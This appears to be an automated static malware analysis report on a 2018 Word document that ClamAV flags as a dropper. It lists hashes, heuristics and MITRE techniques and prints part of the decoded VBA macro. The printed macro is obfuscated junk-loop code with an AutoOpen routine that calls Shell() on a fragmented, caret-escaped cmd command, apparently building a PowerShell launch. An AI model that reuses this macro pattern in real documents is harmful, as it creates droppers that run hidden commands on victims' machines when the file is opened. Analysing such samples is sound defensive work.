Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95aebc324fe3a164…

MALICIOUS

Office (OLE)

124.5 KB Created: 2018-06-04 13:38:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: ca61c528aab8c72513e37dd2c38fafed SHA-1: 4b0790b45d94353c7917463412110e190044260f SHA-256: 95aebc324fe3a1647a8a17265c015d866f89f5fd7d0aa8bf38717ff444c75ecf
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. The macro utilizes the Shell() function, which is a critical indicator of malicious activity, suggesting the execution of an external command. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The Autoopen macro is present, indicating it will execute upon opening the document. The primary function of this macro appears to be launching a secondary payload, hence the 'Malicious File' technique.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6573347-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6573347-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19641 bytes
SHA-256: d64ca4386ae4fca148aa4eb4ebdb4239b6d8895dae4ae67e454579f5902fac66
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RpnkwILZdifQsR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pFwZcm()
On Error Resume Next
For tSTQSA = sqhaX To 88141
         aXlfo = (BrHACu - ChrW(26730 * 91625) * koBFbM * CInt(njicrW + Sqr(80365)) + 15249 - 59768 / 63385 - CDate(AcXcmT - 42407 + 71017 - Hex(LSNYm / 10879)) + (GsYSS * Tan(skEzMI)))
Next
For BzVVNN = FHCij To 82123
         WUSKp = (HjPGOO - ChrW(11682 * 68592) * XoHNFA * CInt(wsKZm + Sqr(18409)) + 97354 - 80006 / 81825 - CDate(bkWPmn - 43605 + 44054 - Hex(RjPGw / 13907)) + (SjNbVk * Tan(KYazQ)))
Next
pFwZcm = bzsuhL + Shell(cmPUjSsqflo + Chr(LSiODQb + vbKeyC + UPUpZDubGz) + UtMOnIMWsZw + pRmWNkHjim + iEBkmSb + IfjzzIMcr + tPBDpVi + jifflOKJ + XuXjwr + cCaGlzhKwt, XQtCAH + 0 + NNPwZKl)
For zkZPfn = MXlBk To 82177
         ibhlMR = (rObPN - ChrW(81758 * 50688) * rLnGY * CInt(hJzbLl + Sqr(43483)) + 89987 - 95783 / 23247 - CDate(fDbiro - 75199 + 97669 - Hex(GVwASw / 91271)) + (jaNiS * Tan(BShKA)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For jwRPYi = wiAXAH To 54722
         LLzIO = (WOXwMM - ChrW(91652 * 50503) * JimSO * CInt(EibkJ + Sqr(93486)) + 42514 - 61202 / 6045 - CDate(XqnqG - 65716 + 3264 - Hex(qKhtRM / 41858)) + (YNqsOo * Tan(JGdXY)))
Next
pFwZcm
For tAiUl = WHkKbc To 99533
         EcLROO = (YIoKw - ChrW(65916 * 55181) * jdKdhz * CInt(zZjXz + Sqr(69000)) + 77687 - 6637 / 30054 - CDate(ONIju - 23170 + 17120 - Hex(nVrtK / 73975)) + (tdAjQ * Tan(Siudmk)))
Next
End Sub


Attribute VB_Name = "OhjFZtjVTzoRB"
Function UtMOnIMWsZw()
On Error Resume Next
For HkYWo = JBapt To 98056
         NzdLJ = (LnjXC - ChrW(11301 * 35809) * imiXj * CInt(aHLCZ + Sqr(32902)) + 83606 - 59753 / 76458 - CDate(uiqqin - 34598 + 45937 - Hex(tzSaNW / 32024)) + (AiPwR * Tan(wiFob)))
Next
jXEfAwGzfLl = "md wadJ" + "slif UIVQQPTBzF" + "hZCqsq" + "thnobPU Ljh"
For sajzwc = PborU To 12623
         mCHhzf = (vrAXo - ChrW(56161 * 40760) * Mdwqlt * CInt(SSikC + Sqr(2545)) + 88501 - 23078 / 75591 - CDate(phatWY - 81988 + 92059 - Hex(zjjbIz / 97900)) + (PLsdV * Tan(TjpCMc)))
Next
cdfCLr = "ckrsvP" + "ukc &     %^" + "c^o^" + "m^S^p^E" + "^c^" + "%    " + " %^c^o^m^S^p^" + "E^c^%    " + " /V    " + "     "
For BfNcw = vAqEIu To 13492
         jmrWlD = (iAuSUq - ChrW(12122 * 19503) * VdTXwE * CInt(zJDDV + Sqr(48912)) + 12652 - 70638 / 66509 - CDate(ukzzj - 52308 + 47993 - Hex(WiSKdF / 78351)) + (Iiibjz * Tan(TsMizK)))
Next
ApsiT = "/c       " + "    set %RtoZ" + "mzqkiU" + "XnQCr%=s"
For uJjGv = MjpCu To 92255
         aApfz = (fQXGG - ChrW(58528 * 90189) * iFTsZ * CInt(RkIaX + Sqr(19784)) + 36694 - 55784 / 49280 - CDate(bhnZES - 6202 + 63815 - Hex(kfoWDc / 53260)) + (PidVJ * Tan(fIqsO)))
Next
OjVGtwtu = "zs" + "sBhE&&set %nlMS" + "WCmTiEjR" + "%=p&&set %qPQh" + "iUwjBnpVZ%=o^w"
For mwCqd = ZqVBLC To 74369
         olcNF = (wJDuvY - ChrW(34566 * 23788) * ROZoZ * CInt(oczsZD + Sqr(71461)) + 60937 - 27989 / 43698 - CDate(iCjtfc - 75060 + 32167 - Hex(dsIuF / 23990)) + (hDmmN * Tan(IzJfU)))
Next
jCCNHIQwSOo = "&&set %f" + "mZNOoiNHGP" + "ZAtO%=iZ" + "jzqMt&&" + "set %sSvmSG" + "NF" + "nkdX%=!%nl" + "MSWCmTiEjR%" + "!&&set %LizsC" + "RCrbjoI"
For uLdoXU = PfOmlm To 46157
         VvUCn = (qDcbk - ChrW(26201 * 41039) * hkAHGW * CInt(zEkaP + Sqr(94966)) + 64404 - 36810 / 33016 - CDate(zpznD - 78394 + 54875 - Hex(TEHBMm / 13506)) + (Uwimi * Tan(BNVrjc)))
Next
SEqHR = "mMj%=" + "wEHPhAcr" + "Hdv&" + "&set %wDaz" + "oditbPJ" + "wb%=e^r&" + "&set" + " %VdaH" + "drNAQpU%=!"
UtMOnIMWsZw = jXEfAwGzfLl + cdfCLr + ApsiT + OjVGtwtu + jCCNHIQwSOo + SEqHR
End Function
Function pRmWNkHjim()
On Error Resume Next
For PIkLb = XWHdvX To 51306
         SszrzT = (cjoiWT - ChrW(76898 * 72626) * LFAIE * CInt(XqlBjw + Sqr(26278)) + 39427 - 65998 / 28390 - CDate(sjUXA - 73066 + 17649 - Hex(mZvjES / 69163)) + (pSqXRi * Tan(UHFwk)))
Next
zCwblW = "%qPQhiUw" + "jBnpV
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.